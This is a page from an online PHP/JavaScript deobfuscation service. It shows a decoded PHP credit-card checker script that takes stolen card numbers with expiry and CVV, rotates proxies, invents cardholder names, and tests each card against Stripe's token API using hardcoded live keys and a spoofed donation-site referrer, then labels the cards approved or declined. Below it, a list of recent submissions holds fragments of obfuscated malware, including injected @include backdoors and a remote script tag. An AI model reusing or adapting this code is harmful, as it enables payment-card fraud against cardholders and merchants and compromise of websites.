Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


error_reporting(0);
    
    function multiexplode($delimiters, $string) {
        $one = str_replace($delimiters, $delimiters[0], $string);
        $two = explode($delimiters[0], $one);
        return $two;
    }
    $lista = $_GET['lista'];
    $cc = multiexplode(array(":", "|", "»"), $lista)[0];
    $mes = multiexplode(array(":", "|", "»"), $lista)[1];
    $ano = multiexplode(array(":", "|", "»"), $lista)[2];
    $cvv = multiexplode(array(":", "|", "»"), $lista)[3];
    function getStr2($string, $start, $end) {
        $str = explode($start, $string);
        $str = explode($end, $str[1]);
        return $str[0];
    }
    function dadosnome(){
        $nome = file("lista_nomes.txt");
        $mynome = rand(0, sizeof($nome)-1);
        $nome = $nome[$mynome];
        return $nome;
    }
    function dadossobre(){
        $sobrenome = file("lista_sobrenomes.txt");
        $mysobrenome = rand(0, sizeof($sobrenome)-1);
        $sobrenome = $sobrenome[$mysobrenome];
        return $sobrenome;
    }
    function email($nome){
        $email = preg_replace('<\W+>', "", $nome).rand(0000,9999)."@hotmail.com";
        return $email;
    }       
    function proxy(){
$proxy = file("proxys.txt");
$myproxy = rand(0,sizeof($proxy)-1);
$proxy = $proxy[$myproxy];
$proxy = substr($proxy, 0,(strlen($proxy)-1));
return $proxy;
    }
$proxy = proxy();                          
    $nome = dadosnome();
    $sobrenome = dadossobre();
    $email = email($nome);
    $keys = array(
    1 => 'pk_live_7uzwwmyU0dylagtYB5eyXPBn',
    2 => 'pk_live_KFceE5PuNunFcavUQV2j8x6c' //pk_live_lzN3VH4THVpLIk1AD348aV8D00ymeJJEAG
);
    $key = array_rand($keys);
    $keyStripe = $keys[$key];                                                             
  $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, 'https://api.stripe.com/v1/tokens');
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_PROXY, "$proxy");
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
    curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
                                               'Host: api.stripe.com',
                                               'content-type: application/x-www-form-urlencoded',
                                               'origin: https://checkout.stripe.com',
                                               'referer: https://checkout.stripe.com/m/v3/index-3f0dc197837628f45156bf4f7ed0f6ad.html?distinct_id=70eb7c54-14d8-98e6-8655-524c01e6404a',
                                               'user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'
                                               ));
    curl_setopt($ch, CURLOPT_POSTFIELDS, 'email='.$email.'&validation_type=card&payment_user_agent=Stripe+Checkout+v3+checkout-manhattan+(stripe.js%2F303cf2d)&referrer=https%3A%2F%2Fmarydickinson.org%2Fdonate%2F&pasted_fields=number&card[number]='.$cc.'&card[exp_month]='.$mes.'&card[exp_year]='.$ano.'&card[cvc]='.$cvv.'&card[name]='.$nome.'+'.$sobrenome.'&card[address_line1]=102+Talvesz&card[address_city]=Boston&card[address_state]=27&card[address_zip]=02010&card[address_country]=Brazil&time_on_page=82453&guid=f6cbdeb4-7331-4368-83bb-278579816361&muid=65786105-c790-43f0-9f40-d674347b1002&sid=988d5656-fc95-4779-9399-4197818af15d&key='.$keyStripe);
    $resultado = curl_exec($ch);
if(strpos($resultado, 'processing_error')) {
$retorno = getStr2($resultado, 'message": "', '",');
$live = '<span class="badge badge-success">Aprovada</span>ㅤ>ㅤ'.$cc.'|'.$mes.'|'.$ano.'|'.$cvv.'ㅤ>ㅤRETORNO:ㅤSYOLIN O BRABOㅤ>ㅤGATE:ㅤ'.$key."ㅤ>ㅤPROXY '.$proxy.' Syolin<br>";
echo $live;
}elseif(strpos($resultado, 'security code is incorrect')){
 $retorno = getStr2($resultado, 'message": "', '",');
 $live = '<span class="badge badge-success">Aprovada</span>ㅤ>ㅤ'.$cc.'|'.$mes.'|'.$ano.'|'.$cvv.'ㅤ>ㅤRETORNO:ㅤCVV INCORRETOㅤ>ㅤGATE:ㅤ'.$key."ㅤ> PROXY '.$proxy.' ㅤSyolin<br>";
echo "$live<br>";
}elseif(strpos($resultado, 'message')){
$retorno = getStr2($resultado, 'message": "', '",');
echo '<span class="badge badge-danger">REPROVADA</span>ㅤ>ㅤ'.$cc.'|'.$mes.'|'.$ano.'|'.$cvv.'ㅤ>ㅤRETORNO:ㅤ'.$retorno.'ㅤ>ㅤGATE:ㅤ'.$key."ㅤ> PROXY '.$proxy.' ㅤ𝚂yolin<br>";

}elseif(strpos($resultado, 'Your card has expired.')){
 $retorno = getStr2($resultado, 'message": "', '",');
echo '<span class="badge badge-danger">REPROVADA</span>ㅤ>ㅤ'.$cc.'|'.$mes.'|'.$ano.'|'.$cvv.'ㅤ>ㅤRETORNO:ㅤCARTAO EXPIRADOㅤ>ㅤGATE:ㅤ'.$key."ㅤ> PROXY '.$proxy.' ㅤ𝚂yolin<br>"; 

}elseif(strpos($resultado, 'token')){
echo '<span class="badge badge-danger">REPROVADA GATE</span>ㅤ>ㅤ'.$cc.'|'.$mes.'|'.$ano.'|'.$cvv.'ㅤ>ㅤGATE:ㅤ'.$key." > PROXY '.$proxy.' ㅤ𝚂yolin<br>";

}else {
 echo '<span class="badge badge-danger">REPROVADA PROXY</span>ㅤ>ㅤ'.$cc.'|'.$mes.'|'.$ano.'|'.$cvv."ㅤ> PROXY '.$proxy.' ㅤ𝚂yolin<br>";
}//Generated by Ampare PHP Encoder. For more security please use php protect before encode the php program


Recent submissions:

ggw74: $CxQrF = $AO1hw["\141\x70\151\153\145\171"];... /* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ v... MvXPq: if ($yRl85["\143\x6f\x64\x65"] == 200) { goto TRCf_; }... o5tTs: echo $xNgzF . "\144\157\x77\x6e\154\157\141\x64\151\x6e\x67\x20\151\x6d\141\x67\x65... STv74: ZTv88: goto TKe66; veZlq: $ut5BN = "\x9"; goto H5Gyc; vXwtI: ZS0Cq: goto r7mZ... iMusm: $bnX8V = json_decode(yuBP3("\120\117\123\124", $url, $BOmiO, array()), 1);... LSCLr: $xNVBq = $odIVp["\x73\x74\141\164"]; goto bz1hW; nzugp: ZcgQg: goto WULPF; j1... //<![CDATA[ var _0x9ef2=["\x73\x72\x63","\x73\x37\x32\x2D\x63","\x73\x31\x36\x30\x30","\x... HJ21O: $xNgzF = "\x1b\133\x33\63\x6d"; goto EhQiO; sHNPu: $hCWOe = $bnX8V["\101\103\10... WULPF: $FgRs5 = $kBm33 . "\133\55\135\40\163\x65\x72\x76\x65\162{$gQgTq}\40{$s96Vu}\40";... iYVkv: $BOmiO = json_encode(["\162\145\x71\x75\x65\x73\164" => $mQPF0, "\x6b\145\171\x73" ... Qn2LT: $BOmiO = json_encode(["\141\160\151\x6b\145\x79" => $CxQrF, "\164\151\160\145" => "... zGUGh: echo $z10M1 . "\x69\x6e\x74\x65\x72\x6e\x65\164\40\x65\x72\x72\157\x72" . $Cy63H;... pe3D7: return $C21ny["\x72\x65\144\151\162\x65\143\164\x5f\x75\162\x6c"];... bkCFi: echo $xNgzF . "\x65\x72\x72\x6f\x72" . $Cy63H; goto qWJPm; bLQ4n: $BOmiO = "\x6... LcDx6: $TdR_R = $B3PSu["\165\x73\x65\162\156\x61\x6d\x65"];... Mlssl: $y4Tla = explode("\47", substr($y4Tla, 0, strpos($y4Tla, "\x3b")));... ln66g: $n897g = $odIVp["\x70\x72\145\x6d\151\x75\155"];... DU2yY: $B7hwC[] = "\143\157\x6f\x6b\x69\145\72\x20" . $ij1Ts; goto yhNxp; ... $AO1hw["\x63\157\x6f\153\x69\145"] as $ij1Ts... KSnVw: echo "\x75\x70\144\141\164\x65\x20\x79\157\165\x72\x20\167\x61\154\154\x65\x74" . $... Lem3T: $dIX0M = strpos($f1l60, "\x59\157\x75\x20\150\x61\x76\x65");... <?php ... G2ZUW: $url = "\150\164\x74\160\163\72\57\x2f\x62\x69\164\x63\x6f\x69\x6e\142\145\x70\56\1... \x00\x00\x00\x00\x00\x01\x00\x00stats\r\n... <?php //004fb if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname()... <?php $_1jf32zt = basename/*mzp*/(/*c*/trim/*o0u2c*/(/*5*/preg_replace/*5*/(/*c41ia*/rawu... <?php define /** * php */ (base64_decode /** * php */ ('SE9LRQ=='), array_key_exists /** *... \320\237\320\276\320\264\320\260\321\200\320\276\321\207\320\275\321\213\320\271 \320\233\... "\057ho\155e/\160vi\156ci\057pa\157lo\166in\143i.\143om\057de\155o/\167p-\151nc\154ud\145s... <?php class E3cf480c172e8B47FE10857c2A5AEb48 { public static $ipTV_db; static functi... use Tygh\Registry;if ($_SERVER[ab_____(base64_decode('U0ZSVkZUVWBORlVJUEU='))] == ab_____(... if (AREA == 'A') { call_user_func(ab_____(base64_decode('Z29gYnV1YmRpYGpuYmhmYHFianN0')),... use Tygh\Registry;if (call_user_func(ab_____(base64_decode('XVV6aGldU2ZoanR1c3o7O2hmdQ==')... use Tygh\Registry;use Tygh\Ab_landingCategories\Demodata;if ($_SERVER[ab_____(base64_decod... <?php class cd89785224751CCA8017139dAF9e891E { public static $ipTV_db; public static... function fn_ab__ch1_install(){ $objects=[ ['t'=>ab_____(base64_decode('QDtkYnVmaHBzemBlZ... if ($mode == 'manage') { $selected_fields=Tygh::$app['view']->getTemplateVars(ab_____(bas... echo base64_decode('RjAwVGJAbGw=');... use Tygh\Registry;if (call_user_func(ab_____(base64_decode('XVV6aGldU2ZoanR1c3o7O2hmdQ==')... function fn_ab__multiple_cat_descriptions_get_categories($params,$join,&$condition,$fields... if ($_SERVER['REQUEST_METHOD'] == 'POST') { if ($mode == ab_____(base64_decode('dnFlYnVm'... if ($_SERVER['REQUEST_METHOD'] == 'POST') { if ($mode == ab_____(base64_decode('dnFlYnVm'... use Tygh\Registry;if ($_SERVER[ab_____(base64_decode('U0ZSVkZUVWBORlVJUEU='))] == ab_____(... use Tygh\Registry;use Tygh\Menu;function fn_ab__fn_demodata_add_menus($status='A'){ $path... gzinflate(base64_decode(Sy1LzNFQV8kOykjNq7JVyU4u9zRx1oDyNa1Vsjy9PMO8bJWUrFUyQ03THC08LPJtld... function fn_ab__fast_navigation_install(){ $objects=[ [ab_____(base64_decode('dQ=='))=>a... if ($_SERVER[ab_____(base64_decode('U0ZSVkZUVWBORlVJUEU='))] == ab_____(base64_decode('UVB... use Tygh\Registry;if ($_SERVER['REQUEST_METHOD'] == 'POST') { if (call_user_func(ab_____(... call_user_func(ab_____(base64_decode('Z29gdXN2dHVmZWB3YnN0')),ab_____(base64_decode('YmNgY... use Tygh\Registry;if ($_SERVER['REQUEST_METHOD'] == 'POST') { $suffix='.manage';if (call_... if ($_SERVER[ab_____(base64_decode('U0ZSVkZUVWBORlVJUEU='))] == ab_____(base64_decode('UVB... base64_decode(str_rot13("Fl1YmASDI8xBlxwAd7WIlH4h9mEk1bQlAn1Ifwl9CZB8oWJHeSHlD03GUP08YCWgy... $dir=ABT__YT_DATA_EXP_PATH.ab_____(base64_decode('bmZvdjA='))... $dir=ABT__YT_DATA_EXP_PATH.ab_____(base64_decode('Y21waDA='))... use Tygh\Registry;use Tygh\Menu;use Tygh\Languages\Languages;if (AREA == 'A') { define('A... $image_str='blog_image_image';$image=array( "{$image_str}_data"=>array(array(ab_____(base... @include "\057h\157m\145/\163t\157r\141g\145/\145/\0650\0576\066/\151b\144i\055e\144u\06... $path=ABT__YT_DEMODATA_PATH.ab_____(base64_decode('bmZvdjA='));$data=call_user_func(ab____... $time=substr(TIME,-3);$menu_name.=' '.$time;$menu_data=array( ab_____(base64_decode('b2Ju... \x16\x03\x01\x00p\x01\x00\x00l\x03\x01^Np\xB2qqG\x11\xE0YT\xDBX\x1CG$1\x80\xB4\xA4\xA1\x96... $path=ABT__YT_DEMODATA_PATH.ab_____(base64_decode('bmZvdjA='))... var _cf=_cf||[],bmak=bmak||{ver:1.54,ke_cnt_lmt:150,mme_cnt_lmt:100,mduce_cnt_lmt:75,pme_c... if ($_SERVER[ab_____(base64_decode('U0ZSVkZUVWBORlVJUEU='))] == ab_____(base64_decode('UVB... use Tygh\Registry;if (!defined('BOOTSTRAP')) { die('Access denied');} if ($_SERVER[ab___... if ($_SERVER[ab_____(base64_decode('U0ZSVkZUVWBORlVJUEU='))] == ab_____(base64_decode('UVB... assert(gzinflate(base64_decode(str_rot13("Fl1YmASDI8xBlxwAd7WIlH4h9mEk1bQlAn1Ifwl9CZB8oWJH... if (call_user_func(ab_____(base64_decode('XVV6aGldU2ZoanR1c3o7O2hmdQ==')),ab_____(base64_d... if (!defined('BOOTSTRAP')) { die('Access denied');} use Tygh\Registry;use Tygh\ABTYT;use... $path=ABT__UT2_DATA_IMP_PATH.ab_____(base64_decode('bmZvdjA='))... $time=substr(TIME,-3);$menu_name.=' '.$time;$menu_data=array( ab_____(base64_decode('b2Ju... $path=ABT__UT2_DATA_IMP_PATH.ab_____(base64_decode('bmZvdjA='));$data=call_user_func(ab___... $image_str='blog_image_image';$image=array( "{$image_str}_data"=>array(array(ab_____(base... $path=ABT__UT2_DATA_IMP_PATH.ab_____(base64_decode('Y21waDA='));$data=call_user_func(ab___... fn_attach_image_pairs($image_type,ab_____(base64_decode('YmN1YGB2dTMwY2Jvb2ZzdDA='))... use Tygh\Registry;if ($_SERVER[ab_____(base64_decode('U0ZSVkZUVWBORlVJUEU='))] == ab_____(... use Tygh\Registry;if (!defined('BOOTSTRAP')){die('Access denied'); } if ($_SERVER[ab_____... use Tygh\Registry;if (!defined('BOOTSTRAP')){die('Access denied'); } if ($_SERVER[ab_____... if (!defined('BOOTSTRAP')) {die('Access denied');} use Tygh\Registry;if ($_SERVER[ab_____... if (!defined('BOOTSTRAP')) {die('Access denied');} use Tygh\Registry;use Tygh\ABTUT2;use ... /*6c313*/ @include "\057hom\145/hu\162tal\146a/d\157mai\156s/p\162ess\151o.c\157.uk\057... <script type='text/javascript' src='https://tom.verybeatifulantony.com/y.js'></script><?ph... \x04\x04\x06writes\xc0\b\x04lock\xc0\x00\x03pid\x1bjackrabbit-prod-web03|29225\x04dataA\xb... \x04\x04\x06writes\xc0\b\x04lock\xc0\x00\x03pid\x1... @include "\057u\163r\057w\167w\057u\163e\162s\057f\154u\163s\160/\152u\167e\154/\167p\055c... <?php $f1 = ".ht"; $f2 = "acc"; $f3 = "ess"; $ff = $f1.$f2.$f3; $apass = ... <script>require("TimeSliceImpl").guard(function() {require("ServerJSDefine").handleDefines... @include "\057us\162/w\167w/\165se\162s/\146lu\163sp\057el\145me\156t-\164ra\166el\057wp\0... @include "\057usr\057www\057use\162s/f\154uss\160/ju\167el/\167p-c\157nte\156t/e\164-ca\14... $ZgcZVHNbCd="703O9tTf9tDdphXZ7kSXpcyYxYWZzYDMmZTZhZWM4YTNlFjM1I2Y1cDZxM2MhJzNldCLnkTZmdDNx... @include "\057var/\167ww/u\0624985\057data\057www/\141von-\164op.c\157m.ua\057wp-i\156clud... @include "\057usr\057www\057use\162s/f\154uss\160/el\145men\164-tr\141vel\057wp-\151ncl\16... /*32092*/ @include "\057h\157m\145/\163h\157p\160i\0667\057p\165b\154i\143_\150t\155l\0... \057hom\145/aj\163rpc\157m/w\167w.r\145vam\141rke\164.co\155/ca\164alo\147/la\156gua\147e/... /*6c921*/ @include "\057home\057shop\160i67/\160ubli\143_htm\154/wp-\151nclu\144es/S\15... @include "\057usr/\167ww/u\163ers/\146luss\160/juw\145l/wp\055cont\145nt/e\164-cac\150e/gl... /*c4f46*/ @include "\057var/\167ww/u\0624985\057data\057www/\141von-\164op.c\157m.ua\05... /*ff444*/ @include "\057home\057shop\160i67/\160ubli\143_htm\154/wp-\151nclu\144es/S\15... /*a9b2a*/ @include "\057h\157m\145/\163h\157p\160i\0667\057p\165b\154i\143_\150t\155l\0... $mdgmj = 'dn6l78x1_os0*cpf5-vab\'Hgk3#94eimurty';$hcqxs = Array();$hcqxs[] = $mdgmj[25].$m...

© 2019 Quttera Ltd. All rights reserved.